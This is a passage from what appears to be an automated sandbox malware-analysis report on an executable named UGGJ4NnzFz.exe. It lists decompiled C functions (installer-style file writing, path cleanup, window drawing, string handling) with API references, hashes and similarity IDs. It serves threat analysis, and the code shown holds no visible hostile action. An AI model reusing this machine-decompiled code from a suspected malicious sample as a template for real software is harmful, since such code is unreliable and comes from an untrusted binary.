					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E737512AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7375123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7375247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E737512FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E737512FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73751224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7375405c =  *0x7375405c +  *0x7375405c;
									__edi = GlobalAlloc(0x40,  *0x7375405c +  *0x7375405c);
									 *0x7375405c = MultiByteToWideChar(0, 0, __ebx,  *0x7375405c, __edi,  *0x7375405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E737512FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7375405c;
									__esi = __esi +  *0x73754064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73751429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73751224(0x73754034);
					goto L10;
				}
			}












                                                                                                                0x73752306
                                                                                                                0x7375230a
                                                                                                                0x73752315
                                                                                                                0x73752315
                                                                                                                0x7375231c
                                                                                                                0x73752321
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752325
                                                                                                                0x73752328
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375232d
                                                                                                                0x73752338
                                                                                                                0x73752348
                                                                                                                0x7375233f
                                                                                                                0x73752341
                                                                                                                0x73752357
                                                                                                                0x73752357
                                                                                                                0x00000000
                                                                                                                0x7375232f
                                                                                                                0x7375232f
                                                                                                                0x73752358
                                                                                                                0x7375235c
                                                                                                                0x7375235e
                                                                                                                0x7375235e
                                                                                                                0x73752361
                                                                                                                0x73752361
                                                                                                                0x73752369
                                                                                                                0x7375236c
                                                                                                                0x73752373
                                                                                                                0x73752377
                                                                                                                0x73752446
                                                                                                                0x73752447
                                                                                                                0x73752452
                                                                                                                0x7375247d
                                                                                                                0x7375247d
                                                                                                                0x73752462
                                                                                                                0x7375246e
                                                                                                                0x73752464
                                                                                                                0x73752464
                                                                                                                0x73752464
                                                                                                                0x00000000
                                                                                                                0x7375237d
                                                                                                                0x7375237d
                                                                                                                0x00000000
                                                                                                                0x73752384
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375238d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375239b
                                                                                                                0x7375239e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737523a7
                                                                                                                0x737523ac
                                                                                                                0x737523af
                                                                                                                0x737523b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737523bd
                                                                                                                0x737523c8
                                                                                                                0x737523d7
                                                                                                                0x737523e2
                                                                                                                0x73752405
                                                                                                                0x73752408
                                                                                                                0x737523e4
                                                                                                                0x737523e8
                                                                                                                0x737523ee
                                                                                                                0x737523ef
                                                                                                                0x737523f2
                                                                                                                0x737523f3
                                                                                                                0x737523f6
                                                                                                                0x737523fd
                                                                                                                0x737523fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752410
                                                                                                                0x73752413
                                                                                                                0x7375241f
                                                                                                                0x73752421
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752424
                                                                                                                0x73752427
                                                                                                                0x73752428
                                                                                                                0x7375242f
                                                                                                                0x73752436
                                                                                                                0x73752439
                                                                                                                0x7375243b
                                                                                                                0x7375243e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375237d
                                                                                                                0x73752377
                                                                                                                0x7375234d
                                                                                                                0x73752352
                                                                                                                0x00000000
                                                                                                                0x73752352

                                                                                                                APIs
                                                                                                                • GlobalFree.KERNEL32 ref: 73752447
                                                                                                                  • Part of subcall function 73751224: lstrcpynA.KERNEL32(00000000,?,737512CF,-7375404B,737511AB,-000000A0), ref: 73751234
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 737523C2
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 737523D7
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 737523E8
                                                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 737523F6
                                                                                                                • GlobalFree.KERNEL32 ref: 737523FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                • String ID: @ut
                                                                                                                • API String ID: 3730416702-3384101347
                                                                                                                • Opcode ID: d69b355592fe1ed8c0202f97d2b4e8587badd2cd660139b168f0655e19fd59bb
                                                                                                                • Instruction ID: 7fb1697f00d685657d02dac92c51679973414d284ac88564d84ddcd2e3249f21
                                                                                                                • Opcode Fuzzy Hash: d69b355592fe1ed8c0202f97d2b4e8587badd2cd660139b168f0655e19fd59bb
                                                                                                                • Instruction Fuzzy Hash: B641C1B2A04349DFE71D9F20C948B6AB7F9FF44312F24481AF48ACB190D7349944CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                0x00405dca
                                                                                                                0x00405dd2
                                                                                                                0x00405de6
                                                                                                                0x00405de6
                                                                                                                0x00405dec
                                                                                                                0x00405df9
                                                                                                                0x00405df9
                                                                                                                0x00405dfa
                                                                                                                0x00405dfc
                                                                                                                0x00405e00
                                                                                                                0x00405e02
                                                                                                                0x00405e0b
                                                                                                                0x00405e0d
                                                                                                                0x00405e27
                                                                                                                0x00405e2f
                                                                                                                0x00405e2f
                                                                                                                0x00405e34
                                                                                                                0x00405e36
                                                                                                                0x00405e38
                                                                                                                0x00405e3c
                                                                                                                0x00405e3d
                                                                                                                0x00405e40
                                                                                                                0x00405e48
                                                                                                                0x00405e4a
                                                                                                                0x00405e4e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405e54
                                                                                                                0x00405e59
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405e59
                                                                                                                0x00405e5e

                                                                                                                APIs
                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 589700163-1104420103
                                                                                                                • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                                • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                0x00403f91
                                                                                                                0x00404025
                                                                                                                0x00000000
                                                                                                                0x00404025
                                                                                                                0x00403fa2
                                                                                                                0x00403fa6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403fac
                                                                                                                0x00403fb5
                                                                                                                0x00403fb8
                                                                                                                0x00403fb8
                                                                                                                0x00403fbe
                                                                                                                0x00403fc4
                                                                                                                0x00403fc4
                                                                                                                0x00403fd0
                                                                                                                0x00403fd6
                                                                                                                0x00403fdd
                                                                                                                0x00403fe0
                                                                                                                0x00403fe3
                                                                                                                0x00403fe5
                                                                                                                0x00403fe5
                                                                                                                0x00403fed
                                                                                                                0x00403ff3
                                                                                                                0x00403ff3
                                                                                                                0x00403ffd
                                                                                                                0x00404002
                                                                                                                0x00404005
                                                                                                                0x0040400a
                                                                                                                0x0040400d
                                                                                                                0x0040400d
                                                                                                                0x0040401d
                                                                                                                0x0040401d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                0x0040267c
                                                                                                                0x0040267e
                                                                                                                0x0040268a
                                                                                                                0x0040268d
                                                                                                                0x00402697
                                                                                                                0x0040269b
                                                                                                                0x0040269b
                                                                                                                0x004026a1
                                                                                                                0x004026ae
                                                                                                                0x004026b6
                                                                                                                0x004026b9
                                                                                                                0x004026bf
                                                                                                                0x004026cd
                                                                                                                0x004026d2
                                                                                                                0x004026d6
                                                                                                                0x004026d9
                                                                                                                0x004026e2
                                                                                                                0x004026ee
                                                                                                                0x004026f2
                                                                                                                0x004026f5
                                                                                                                0x004026ff
                                                                                                                0x0040271e
                                                                                                                0x00402706
                                                                                                                0x0040270b
                                                                                                                0x00402713
                                                                                                                0x00402716
                                                                                                                0x0040271b
                                                                                                                0x0040271b
                                                                                                                0x00402725
                                                                                                                0x00402725
                                                                                                                0x00402737
                                                                                                                0x0040273e
                                                                                                                0x00402750
                                                                                                                0x00402750
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402761
                                                                                                                0x00402762
                                                                                                                0x00402766
                                                                                                                0x0040276a
                                                                                                                0x00402770
                                                                                                                0x00402770
                                                                                                                0x00402777
                                                                                                                0x00402164
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3294113728-0
                                                                                                                • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                                • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                                • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                                • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                0x00404f0a
                                                                                                                0x00404f16
                                                                                                                0x00404f19
                                                                                                                0x00404f1f
                                                                                                                0x00404f2b
                                                                                                                0x00404f2e
                                                                                                                0x00404f31
                                                                                                                0x00404f37
                                                                                                                0x00404f37
                                                                                                                0x00404f3d
                                                                                                                0x00404f45
                                                                                                                0x00404f48
                                                                                                                0x00404f65
                                                                                                                0x00404f69
                                                                                                                0x00404f72
                                                                                                                0x00404f72
                                                                                                                0x00404f7c
                                                                                                                0x00404f85
                                                                                                                0x00404f91
                                                                                                                0x00404f98
                                                                                                                0x00404f9c
                                                                                                                0x00404f9f
                                                                                                                0x00404fb2
                                                                                                                0x00404fc0
                                                                                                                0x00404fc0
                                                                                                                0x00404fc4
                                                                                                                0x00404fc6
                                                                                                                0x00404fc9
                                                                                                                0x00000000
                                                                                                                0x00404fc9
                                                                                                                0x00404f4a
                                                                                                                0x00404f52
                                                                                                                0x00404f5a
                                                                                                                0x00404f60
                                                                                                                0x00000000
                                                                                                                0x00404f60
                                                                                                                0x00404f5a
                                                                                                                0x00404f48
                                                                                                                0x00404fd3

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                                • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                                • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                                • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                0x00402bdf
                                                                                                                0x00402be1
                                                                                                                0x00402be8
                                                                                                                0x00402beb
                                                                                                                0x00402beb
                                                                                                                0x00402bf1
                                                                                                                0x00000000
                                                                                                                0x00402bf1
                                                                                                                0x00402bf9
                                                                                                                0x00402bff
                                                                                                                0x00000000
                                                                                                                0x00402c02
                                                                                                                0x00402c09
                                                                                                                0x00402c0f
                                                                                                                0x00402c15
                                                                                                                0x00402c17
                                                                                                                0x00402c1d
                                                                                                                0x00402c5b
                                                                                                                0x00402c64
                                                                                                                0x00000000
                                                                                                                0x00402c69
                                                                                                                0x00402c1f
                                                                                                                0x00402c26
                                                                                                                0x00402c37
                                                                                                                0x00000000
                                                                                                                0x00402c45
                                                                                                                0x00402c26
                                                                                                                0x00402c71

                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                                                • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                                • wsprintfA.USER32 ref: 00402C37
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                  • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                  • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
